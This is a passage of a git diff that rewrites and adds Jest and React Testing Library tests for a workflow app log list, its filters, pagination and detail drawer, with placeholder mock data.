user.click(screen.getByTestId('next-page-btn')) - - // Assert - await waitFor(() => { 
- expect(screen.getByTestId('current-page')).toHaveTextContent('1') - }) - }) - }) - - describe('State Transitions', () => { - it('should transition from loading to list state', async () => { - // Arrange - start with loading - mockedUseSWR.mockReturnValue({ - data: undefined, - mutate: jest.fn(), - isValidating: true, - isLoading: true, - error: undefined, - }) - - // Act - const { rerender } = render() - expect(screen.getByTestId('loading')).toBeInTheDocument() - - // Update to loaded state - const mockLogs = [createMockWorkflowLog()] - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, 1), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - rerender() - - // Assert - await waitFor(() => { - expect(screen.queryByTestId('loading')).not.toBeInTheDocument() - expect(screen.getByRole('table')).toBeInTheDocument() - }) - }) - }) - }) - - // ============================================================================ - // Tests for Filter Component - // ============================================================================ - - describe('Filter Component', () => { - const mockSetQueryParams = jest.fn() - const defaultFilterProps = { - queryParams: { status: 'all', period: '2' } as QueryParam, - setQueryParams: mockSetQueryParams, - } - - beforeEach(() => { - mockSetQueryParams.mockClear() - mockTrackEvent.mockClear() - }) - - describe('Rendering', () => { - it('should render status filter chip with correct value', () => { - // Arrange & Act - render() - - // Assert - should show "All" as default status - expect(screen.getByText('All')).toBeInTheDocument() - }) - - it('should render time period filter chip', () => { - // Arrange & Act - render() - - // Assert - should have calendar icon (period filter) - const calendarIcons = document.querySelectorAll('svg') - expect(calendarIcons.length).toBeGreaterThan(0) - }) - - it('should render keyword search input', () => { - // Arrange & Act - render() - - // Assert - const searchInput = screen.getByPlaceholderText('common.operation.search') - expect(searchInput).toBeInTheDocument() - }) - - it('should display different status values', () => { - // Arrange - const successStatusProps = { - queryParams: { status: 'succeeded', period: '2' } as QueryParam, - setQueryParams: mockSetQueryParams, - } - - // Act - render() - - // Assert - expect(screen.getByText('Success')).toBeInTheDocument() - }) - }) - - describe('Keyword Search', () => { - it('should call setQueryParams when keyword changes', async () => { - // Arrange - const user = userEvent.setup() - render() - - // Act - const searchInput = screen.getByPlaceholderText('common.operation.search') - await user.type(searchInput, 'test') - - // Assert - expect(mockSetQueryParams).toHaveBeenCalledWith( - expect.objectContaining({ keyword: expect.any(String) }), - ) - }) - - it('should render input with initial keyword value', () => { - // Arrange - const propsWithKeyword = { - queryParams: { status: 'all', period: '2', keyword: 'test' } as QueryParam, - setQueryParams: mockSetQueryParams, - } - - // Act - render() - - // Assert - const searchInput = screen.getByPlaceholderText('common.operation.search') - expect(searchInput).toHaveValue('test') - }) - }) - - describe('TIME_PERIOD_MAPPING Export', () => { - it('should export TIME_PERIOD_MAPPING with correct structure', () => { - // Assert - expect(TIME_PERIOD_MAPPING).toBeDefined() - expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) - expect(TIME_PERIOD_MAPPING['9']).toEqual({ 
value: -1, name: 'allTime' }) - }) - - it('should have all required time period options', () => { - // Assert - verify all periods are defined - expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) - expect(TIME_PERIOD_MAPPING['2']).toHaveProperty('name', 'last7days') - expect(TIME_PERIOD_MAPPING['3']).toHaveProperty('name', 'last4weeks') - expect(TIME_PERIOD_MAPPING['4']).toHaveProperty('name', 'last3months') - expect(TIME_PERIOD_MAPPING['5']).toHaveProperty('name', 'last12months') - expect(TIME_PERIOD_MAPPING['6']).toHaveProperty('name', 'monthToDate') - expect(TIME_PERIOD_MAPPING['7']).toHaveProperty('name', 'quarterToDate') - expect(TIME_PERIOD_MAPPING['8']).toHaveProperty('name', 'yearToDate') - }) - - it('should have correct value for allTime period', () => { - // Assert - allTime should have -1 value (special case) - expect(TIME_PERIOD_MAPPING['9'].value).toBe(-1) - }) - }) - }) - - // ============================================================================ - // Tests for WorkflowAppLogList Component - // ============================================================================ - - describe('WorkflowAppLogList Component', () => { - const mockOnRefresh = jest.fn() - - beforeEach(() => { - mockOnRefresh.mockClear() - }) - - it('should render loading when logs or appDetail is undefined', () => { - // Arrange & Act - render() - - // Assert - expect(screen.getByTestId('loading')).toBeInTheDocument() - }) - - it('should render table with correct headers for workflow app', () => { - // Arrange - const mockLogs = createMockLogsResponse([createMockWorkflowLog()], 1) - const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) - - // Act - render() - - // Assert - expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() - }) - - it('should not show triggered_from column for non-workflow apps', () => { - // Arrange - const mockLogs = createMockLogsResponse([createMockWorkflowLog()], 1) - const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) - - // Act - render() - - // Assert - expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() - }) - - it('should render log rows with correct data', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - id: 'test-log-1', - workflow_run: createMockWorkflowRun({ - status: 'succeeded', - elapsed_time: 1.5, - total_tokens: 150, - }), - created_by_account: { id: '1', name: 'John Doe', email: 'john@example.com' }, - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('Success')).toBeInTheDocument() - expect(screen.getByText('1.500s')).toBeInTheDocument() - expect(screen.getByText('150')).toBeInTheDocument() - expect(screen.getByText('John Doe')).toBeInTheDocument() - }) - - describe('Status Display', () => { - it.each([ - ['succeeded', 'Success'], - ['failed', 'Failure'], - ['stopped', 'Stop'], - ['running', 'Running'], - ['partial-succeeded', 'Partial Success'], - ])('should display correct status for %s', (status, expectedText) => { - // Arrange - const mockLog = createMockWorkflowLog({ - workflow_run: 
createMockWorkflowRun({ status: status as WorkflowRunDetail['status'] }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText(expectedText)).toBeInTheDocument() - }) - }) - - describe('Sorting', () => { - it('should toggle sort order when clicking sort header', async () => { - // Arrange - const user = userEvent.setup() - const logs = [ - createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), - createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), - ] - const mockLogs = createMockLogsResponse(logs, 2) - - // Act - render() - - // Find and click the sort header - const sortHeader = screen.getByText('appLog.table.header.startTime') - await user.click(sortHeader) - - // Assert - sort icon should change (we can verify the click handler was called) - // The component should handle sorting internally - expect(sortHeader).toBeInTheDocument() - }) - }) - - describe('Row Click and Drawer', () => { - beforeEach(() => { - // Set app detail for DetailPanel's useStore - mockAppDetail = createMockApp({ id: 'test-app-id' }) - }) - - it('should open drawer with detail panel when clicking a log row', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog({ - id: 'test-log-1', - workflow_run: createMockWorkflowRun({ id: 'run-123', triggered_from: WorkflowRunTriggeredFrom.APP_RUN }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Click on a table row - const rows = screen.getAllByRole('row') - // First row is header, second is data row - await user.click(rows[1]) - - // Assert - drawer opens and DetailPanel renders with real component - await waitFor(() => { - expect(screen.getByTestId('drawer')).toBeInTheDocument() - // Real DetailPanel renders workflow title - expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() - // Real DetailPanel renders Run component with correct URL - expect(screen.getByTestId('run-detail-url')).toHaveTextContent('run-123') - }) - }) - - it('should show replay button for APP_RUN triggered logs', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ id: 'run-abc', triggered_from: WorkflowRunTriggeredFrom.APP_RUN }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - const rows = screen.getAllByRole('row') - await user.click(rows[1]) - - // Assert - replay button should be visible for APP_RUN - await waitFor(() => { - expect(screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' })).toBeInTheDocument() - }) - }) - - it('should not show replay button for WEBHOOK triggered logs', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ id: 'run-xyz', triggered_from: WorkflowRunTriggeredFrom.WEBHOOK }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - const rows = screen.getAllByRole('row') - await user.click(rows[1]) - - // Assert - replay button should NOT be visible for WEBHOOK - await waitFor(() => { - expect(screen.getByTestId('drawer')).toBeInTheDocument() - expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() - }) - }) - - it('should close drawer and call refresh when drawer closes', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog() - 
const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Open drawer - const rows = screen.getAllByRole('row') - await user.click(rows[1]) - - // Wait for drawer to open - await waitFor(() => { - expect(screen.getByTestId('drawer')).toBeInTheDocument() - }) - - // Close drawer - await user.click(screen.getByTestId('drawer-close')) - - // Assert - await waitFor(() => { - expect(screen.queryByTestId('drawer')).not.toBeInTheDocument() - expect(mockOnRefresh).toHaveBeenCalled() - }) - }) - }) - - describe('User Display', () => { - it('should display end user session ID when available', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - created_by_end_user: { id: 'end-user-1', session_id: 'session-abc', type: 'browser', is_anonymous: false }, - created_by_account: undefined, - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('session-abc')).toBeInTheDocument() - }) - - it('should display N/A when no user info available', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - created_by_end_user: undefined, - created_by_account: undefined, - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('N/A')).toBeInTheDocument() - }) - }) - - describe('Unread Indicator', () => { - it('should show unread indicator when read_at is not set', () => { - // Arrange - const mockLog = createMockWorkflowLog({ read_at: undefined }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - const { container } = render( - , - ) - - // Assert - look for the unread indicator dot - const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') - expect(unreadDot).toBeInTheDocument() - }) - }) - }) - - // ============================================================================ - // Tests for TriggerByDisplay Component - // ============================================================================ - - describe('TriggerByDisplay Component', () => { - it.each([ - [WorkflowRunTriggeredFrom.DEBUGGING, 'appLog.triggerBy.debugging', 'icon-code'], - [WorkflowRunTriggeredFrom.APP_RUN, 'appLog.triggerBy.appRun', 'icon-window'], - [WorkflowRunTriggeredFrom.WEBHOOK, 'appLog.triggerBy.webhook', 'icon-webhook'], - [WorkflowRunTriggeredFrom.SCHEDULE, 'appLog.triggerBy.schedule', 'icon-schedule'], - [WorkflowRunTriggeredFrom.RAG_PIPELINE_RUN, 'appLog.triggerBy.ragPipelineRun', 'icon-knowledge'], - [WorkflowRunTriggeredFrom.RAG_PIPELINE_DEBUGGING, 'appLog.triggerBy.ragPipelineDebugging', 'icon-knowledge'], - ])('should render correct display for %s trigger', (triggeredFrom, expectedText, expectedIcon) => { - // Act - render() - - // Assert - expect(screen.getByText(expectedText)).toBeInTheDocument() - expect(screen.getByTestId(expectedIcon)).toBeInTheDocument() - }) - - it('should render plugin trigger with custom event name from metadata', () => { - // Arrange - const metadata: TriggerMetadata = { - event_name: 'Custom Plugin Event', - icon: 'plugin-icon.png', - } - - // Act - render( - , - ) - - // Assert - expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() - }) - - it('should not show text when showText is false', () => { - // Act - render( - , - ) - - // Assert - expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() - expect(screen.getByTestId('icon-window')).toBeInTheDocument() - }) - - it('should apply custom className', () => { - // Act - const { container } = render( - , - 
) - - // Assert - const wrapper = container.firstChild as HTMLElement - expect(wrapper).toHaveClass('custom-class') - }) - - it('should render plugin with BlockIcon when metadata has icon', () => { - // Arrange - const metadata: TriggerMetadata = { - icon: 'custom-plugin-icon.png', - } - - // Act - render( - , - ) - - // Assert - const blockIcon = screen.getByTestId('block-icon') - expect(blockIcon).toHaveAttribute('data-tool-icon', 'custom-plugin-icon.png') - }) - - it('should fall back to default BlockIcon for plugin without metadata', () => { - // Act - render() - - // Assert - expect(screen.getByTestId('block-icon')).toBeInTheDocument() - }) - }) - - // ============================================================================ - // Tests for DetailPanel Component (Real Component Testing) - // ============================================================================ - - describe('DetailPanel Component', () => { - const mockOnClose = jest.fn() - - beforeEach(() => { - mockOnClose.mockClear() - mockRouterPush.mockClear() - // Set default app detail for store - mockAppDetail = createMockApp({ id: 'test-app-123', name: 'Test App' }) - }) - - describe('Rendering', () => { - it('should render title correctly', () => { - // Act - render() - - // Assert - expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() - }) - - it('should render close button', () => { - // Act - render() - - // Assert - close icon should be present - const closeIcon = document.querySelector('.cursor-pointer') - expect(closeIcon).toBeInTheDocument() - }) - - it('should render WorkflowContextProvider with Run component', () => { - // Act - render() - - // Assert - expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() - expect(screen.getByTestId('workflow-run')).toBeInTheDocument() - }) - - it('should pass correct URLs to Run component', () => { - // Arrange - mockAppDetail = createMockApp({ id: 'app-456' }) - - // Act - render() - - // Assert - expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') - expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') - }) - - it('should pass empty URLs when runID is empty', () => { - // Act - render() - - // Assert - expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') - expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') - }) - }) - - describe('Close Button Interaction', () => { - it('should call onClose when close icon is clicked', async () => { - // Arrange - const user = userEvent.setup() - render() - - // Act - click on the close icon - const closeIcon = document.querySelector('.cursor-pointer') as HTMLElement - await user.click(closeIcon) - - // Assert - expect(mockOnClose).toHaveBeenCalledTimes(1) - }) - }) - - describe('Replay Button (canReplay=true)', () => { - it('should render replay button when canReplay is true', () => { - // Act - render() - - // Assert - const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) - expect(replayButton).toBeInTheDocument() - }) - - it('should show tooltip with correct text', () => { - // Act - render() - - // Assert - const tooltip = screen.getByTestId('tooltip') - expect(tooltip).toHaveAttribute('title', 'appLog.runDetail.testWithParams') - }) - - it('should navigate to workflow page with replayRunId when replay is clicked', async () => { - // Arrange - const user = userEvent.setup() - mockAppDetail = 
createMockApp({ id: 'app-for-replay' }) - render() - - // Act - const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) - await user.click(replayButton) - - // Assert - expect(mockRouterPush).toHaveBeenCalledWith('/app/app-for-replay/workflow?replayRunId=run-to-replay') - }) - - it('should not navigate when appDetail.id is undefined', async () => { - // Arrange - const user = userEvent.setup() - mockAppDetail = null - render() - - // Act - const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) - await user.click(replayButton) - - // Assert - expect(mockRouterPush).not.toHaveBeenCalled() - }) - }) - - describe('Replay Button (canReplay=false)', () => { - it('should not render replay button when canReplay is false', () => { - // Act - render() - - // Assert - expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() - }) - - it('should not render replay button when canReplay is not provided (defaults to false)', () => { - // Act - render() - - // Assert - expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() - }) - }) - }) - - // ============================================================================ - // Edge Cases and Error Handling - // ============================================================================ - - describe('Edge Cases', () => { - it('should handle app with minimal required fields', () => { - // Arrange - const minimalApp = createMockApp({ id: 'minimal-id', name: 'Minimal App' }) + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { mockedUseSWR.mockReturnValue({ data: createMockLogsResponse([], 0), mutate: jest.fn(), @@ -1205,63 +220,373 @@ describe('Workflow Log Module Integration Tests', () => { error: undefined, }) - // Act & Assert - expect(() => render()).not.toThrow() - }) - - it('should handle logs with zero elapsed time', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('0.000s')).toBeInTheDocument() - }) - - it('should handle large number of logs', () => { - // Arrange - const largeLogs = Array.from({ length: 100 }, (_, i) => - createMockWorkflowLog({ id: `log-${i}`, created_at: Date.now() - i * 1000 }), - ) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(largeLogs, 1000), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act render() - // Assert - expect(screen.getByRole('table')).toBeInTheDocument() - expect(screen.getByTestId('pagination')).toBeInTheDocument() - expect(screen.getByTestId('total-items')).toHaveTextContent('1000') + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() }) - it('should handle advanced-chat mode correctly', () => { - // Arrange - const advancedChatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) - const mockLogs = createMockLogsResponse([createMockWorkflowLog()], 1) + it('should render title and subtitle', () => { mockedUseSWR.mockReturnValue({ - data: mockLogs, + data: createMockLogsResponse([], 0), mutate: jest.fn(), isValidating: false, isLoading: false, 
error: undefined, }) - // Act - render() + render() - // Assert - should not show triggered_from column + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() + }) + + it('should render Filter component', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Loading State Tests + // -------------------------------------------------------------------------- + describe('Loading State', () => { + it('should show loading spinner when data is undefined', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: true, + isLoading: true, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should not show loading spinner when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty element when total is 0', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.table.empty.element.title')).toBeInTheDocument() + expect(screen.queryByRole('table')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Data Fetching Tests + // -------------------------------------------------------------------------- + describe('Data Fetching', () => { + it('should call useSWR with correct URL and default params', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string; params: Record } + expect(keyArg).toMatchObject({ + url: `/apps/${defaultProps.appDetail.id}/workflow-app-logs`, + params: expect.objectContaining({ + page: 1, + detail: true, + limit: APP_PAGE_LIMIT, + }), + }) + }) + + it('should include date filters for non-allTime periods', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).toHaveProperty('created_at__after') + expect(keyArg?.params).toHaveProperty('created_at__before') + }) + + it('should not include status param when status is all', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + 
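+      // Default status 'all' acts as "no filter": the container is expected to
+      // omit the status key from the request params entirely (asserted below).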
render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).not.toHaveProperty('status') + }) + }) + + // -------------------------------------------------------------------------- + // Filter Integration Tests + // -------------------------------------------------------------------------- + describe('Filter Integration', () => { + it('should update query when selecting status filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click status filter + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + // Check that useSWR was called with updated params + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + status: 'succeeded', + }) + }) + }) + + it('should update query when selecting period filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click period filter + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + // When period is allTime (9), date filters should be removed + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).not.toHaveProperty('created_at__after') + expect(lastCall?.params).not.toHaveProperty('created_at__before') + }) + }) + + it('should update query when typing keyword', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const searchInput = screen.getByPlaceholderText('common.operation.search') + await user.type(searchInput, 'test-keyword') + + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + keyword: 'test-keyword', + }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Pagination Tests + // -------------------------------------------------------------------------- + describe('Pagination', () => { + it('should not render pagination when total is less than limit', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Pagination component should not be rendered + expect(screen.queryByRole('navigation')).not.toBeInTheDocument() + }) + + it('should render pagination when total exceeds limit', () => { + const logs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => + createMockWorkflowLog({ id: `log-${i}` }), + ) + + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse(logs, APP_PAGE_LIMIT + 10), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Should show pagination - checking for any pagination-related element + // The Pagination component renders page controls + 
expect(screen.getByRole('table')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // List Rendering Tests + // -------------------------------------------------------------------------- + describe('List Rendering', () => { + it('should render List component when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should display log data in table', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + status: 'succeeded', + total_tokens: 500, + }), + }), + ], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('500')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Export Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should export TIME_PERIOD_MAPPING with correct values', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle different app modes', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render() + + // Should render without trigger column expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() }) + + it('should handle error state from useSWR', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: new Error('Failed to fetch'), + }) + + const { container } = render() + + // Should show loading state when data is undefined + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should handle app with different ID', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const customApp = createMockApp({ id: 'custom-app-123' }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string } + expect(keyArg?.url).toBe('/apps/custom-app-123/workflow-app-logs') + }) }) }) diff --git a/web/app/components/app/workflow-log/list.spec.tsx b/web/app/components/app/workflow-log/list.spec.tsx new file mode 100644 index 0000000000..be54dbc2f3 --- /dev/null +++ b/web/app/components/app/workflow-log/list.spec.tsx @@ -0,0 +1,751 @@ +/** + * WorkflowAppLogList Component Tests + * + * Tests the workflow log list component which 
displays: + * - Table of workflow run logs with sortable columns + * - Status indicators (success, failed, stopped, running, partial-succeeded) + * - Trigger display for workflow apps + * - Drawer with run details + * - Loading states + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowAppLogList from './list' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock useTimestamp hook +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints hook +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', // Return desktop by default + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock the Run component +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    <div>
+      <span>{runDetailUrl}</span>
+      <span>{tracingListUrl}</span>
+    </div>
+ ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
+    <div>{children}</div>
+ ), +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
<div>BlockIcon</div>
, +})) + +// Mock useTheme +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +// Mock ahooks +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// 